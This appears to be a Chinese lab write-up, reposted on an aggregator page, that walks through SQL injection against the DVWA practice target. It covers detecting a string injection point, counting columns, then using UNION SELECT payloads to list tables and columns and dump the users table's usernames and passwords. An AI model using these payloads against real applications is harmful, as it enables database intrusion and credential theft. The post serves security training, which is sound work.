当前位置: 首页 > news >正文

DVWA靶场SQL注入

本次注入的是DVWA靶场的SQL injection

1.判断是字符型注入还是数字型注入,构造SQL语句

1 and 1=2

由此可以判断出为字符型注入

2.考虑闭合方式,先随便丢一个单引号试试看看报错提示

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

根据报错提示可以看出是引号进行包括的值

3.判断输出的列数,使用order by函数与二分法

可以判断出列数为2

4.联合查询,尝试查看内容回显的地方

构造SQL语句 -1' union select 1,2 #

可以看到回显内容的地方是First name与Surname

查询出数据库 -1' union select 1,database() #

查询出数据表-1' union select 1,group_concat(hex(table_name)) from information_schema.tables where table_schema='dvwa' #

得到两个值去hex解码分别是 guestbook,users这两个也是DVWA数据库下面的所有表名,根据表的名字就可以判断出账号与密码存储在了users这个表里面,所以我们要对这个表进行查询,查询这个表里面的所有字段,开始构造SQL语句

-1' union select 1,group_concat(hex(column_name)) from information_schema.columns where table_schema='dvwa' and table_name='users' #

得到了表下面的所有字段内容

对这些内容分别进行解码,将要查询的字段提取出来,分别是user与password,再次构造SQL语句对这两个字段的内容进行查询

-1' union select 1,group_concat(user,'-',password) from dvwa.users #

成功注入出账号与密码。

http://www.lryc.cn/news/220972.html

相关文章:

  • AD教程 (九)导线及NetLabel的添加
  • Rust函数进阶
  • springboot前后端时间类型传输
  • Deepin安装英特尔AX200 Wifi驱动
  • 第十九节——vue内置组件
  • 路由器基础(二): BGP原理与配置
  • 【漏洞复现】Django _2.0.8_任意URL跳转漏洞(CVE-2018-14574)
  • 【广州华锐互动】军用飞机VR实战训练系统
  • AI生图王者之战!深度体验实测,谁是真正的艺术家?
  • Spring Cloud - 手写 Gateway 源码,实现自定义局部 FilterFactory
  • 14、Python继承和多态:基础继承、方法重写、多态的基本概念
  • 聊聊logback的StatusManager
  • [PyTorch][chapter 61][强化学习-免模型学习1]
  • 网络运维Day04-补充
  • 前端埋点方式
  • iOS导航栏返回按钮
  • 2023中国视频云市场报告:腾讯云音视频解决方案份额连续六次蝉联榜首,加速全球化布局
  • jpa Repository的常用写法总结
  • 笔记本电脑 禁用/启用 自带键盘
  • 基于 golang 从零到一实现时间轮算法 (三)
  • k8s 1.28安装
  • 安装anaconda时控制台conda-version报错
  • 链表(1)
  • 智慧农业:农林牧数据可视化监控平台
  • 知识注入以对抗大型语言模型(LLM)的幻觉11.6
  • 机器人物理交互场景及应用的实际意义
  • Kubernetes Dashboard 用户名密码方式登录
  • Redisson中的对象
  • GNU ld链接器 lang_process()(二)
  • 《国产服务器操作系统发展报告(2023)》重磅发布